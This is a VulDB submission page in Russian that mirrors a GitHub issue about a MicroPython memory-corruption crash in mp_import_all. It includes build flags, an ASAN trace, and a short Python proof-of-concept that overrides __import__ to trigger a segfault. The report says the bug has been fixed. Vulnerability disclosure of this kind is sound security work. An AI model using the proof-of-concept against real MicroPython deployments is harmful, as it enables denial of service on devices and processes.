Отправить #743396: micropython 0fd0843 Memory CorruptionИнформация

Название	micropython 0fd0843 Memory Corruption
Описание	### Port, board and/or hardware unix ### MicroPython version [v1.27.0](https://github.com/micropython/micropython/releases/tag/v1.27.0) and master-branch ### Issue Report ### Description We discovered a Segmentation Fault vulnerability in MicroPython. The crash occurs within mp_map_lookup when executing a from ... import * operation (handled by mp_import_all) on a malformed or unexpected object type. The ASAN report indicates a READ memory access violation causing a SEGV. Notably, ASAN hints at a dereference of a high value address, suggesting that the runtime is attempting to interpret invalid data (garbage or a non-pointer value) as a memory address during the map lookup. Vendor confirmed and fixed this vulnerability in commit (add796b)[https://github.com/dpgeorge/micropython/commit/add796bde13428938d87a97bb00cfa883494af39]. ### Environment - OS: Linux x86_64 - Complier: gcc 11.5.0 - Tools: AddressSanitizer - Affected Version: `master branch` - Build Configure: ``` make CFLAGS_EXTRA="-fsanitize=address --param asan-use-after-return=0" \ LDFLAGS_EXTRA="-fsanitize=address --param asan-use-after-return=0" \ CC=gcc STRIP= -j$(nproc) ``` ### Vulnerability Details - Target: MicroPython (Unix Port) - Vulnerability Type: Segmentation Fault (READ access via bad pointer) - Function: mp_map_lookup - Location: py/map.c:162 - Root Cause Analysis: The crash sequence is mp_execute_bytecode -> mp_import_all -> mp_map_lookup. mp_import_all implements the logic for from module import . It expects to retrieve the globals dictionary (map) from the source object. The crash in mp_map_lookup suggests that: 1. The object being imported from is corrupted or is of a type that mp_import_all does not handle correctly, leading to an invalid map pointer. 2. The map structure itself contains corrupted pointers (buckets), and the "high value address" indicates the code is trying to follow a pointer that is actually garbage data. ### Reproduce 1. Compile the micropython with gcc compiler and AddressSanitizer enabled 2. Run the micropython with the POC input. #### Proof of Concept: ``` import builtins def custom_import(name, globals, locals, fromlist, level): class M: a = 1 return M builtins.__import__ = custom_import __import__('A', None, None, None, 0) from a import ``` ASAN report ``` ==36150==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x55e03cb9e967 bp 0x000000000b5a sp 0x7ffe1df7dfe0 T0) ==36150==The signal is caused by a READ memory access. ==36150==Hint: this fault was caused by a dereference of a high value address (see register values below). Dissassemble the provided pc to learn which register was used. #0 0x55e03cb9e967 in mp_map_lookup ../../py/map.c:162 #1 0x55e03cb9a20f in mp_import_all ../../py/runtime.c:1598 #2 0x55e03cbd12bf in mp_execute_bytecode ../../py/vm.c:1277 #3 0x55e03cbaa19d in fun_bc_call ../../py/objfun.c:295 #4 0x55e03cc8d2bb in parse_compile_execute ../../shared/runtime/pyexec.c:137 #5 0x55e03cc857e0 in do_file /src/repro/micropython/ports/unix/main.c:269 #6 0x55e03cc857e0 in main_ /src/repro/micropython/ports/unix/main.c:692 #7 0x7f7e4b6131c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) #8 0x7f7e4b61328a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) #9 0x55e03cb62fd4 in _start (/src/repro/micropython/ports/unix/build-standard/micropython+0x84fd4) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV ../../py/map.c:162 in mp_map_lookup ==36150==ABORTING ``` ### What does this issue allow an attacker to do? Denial of Service (DoS). An attacker can crash the MicroPython runtime by attempting to perform a specific import operation (likely from <malformed_obj> import ) inside a script. This causes the device to reset or the process to terminate. ### How does the attacker exploit this issue? The attacker supplies a Python script that uses from ... import syntax on a specially crafted object or module structure. This forces mp_import_all to pass an invalid or corrupted map pointer to mp_map_lookup. The runtime then attempts to read from a wild address (the "high value" address), causing a segmentation fault. ### Code of Conduct Yes, I agree
Источник	⚠️ https://github.com/micropython/micropython/issues/18639
Пользователь	Oneafter (UID 92781)
Представление	21.01.2026 08:20 (5 месяцы назад)
Модерация	05.02.2026 18:10 (15 days later)
Статус	принято
Запись VulDB	344546 [micropython до 1.27.0 py/runtime.c mp_import_all повреждение памяти]
Баллы	20

◂ Предыдущий Обзор Далее ▸

Interested in the pricing of exploits?

See the underground prices here!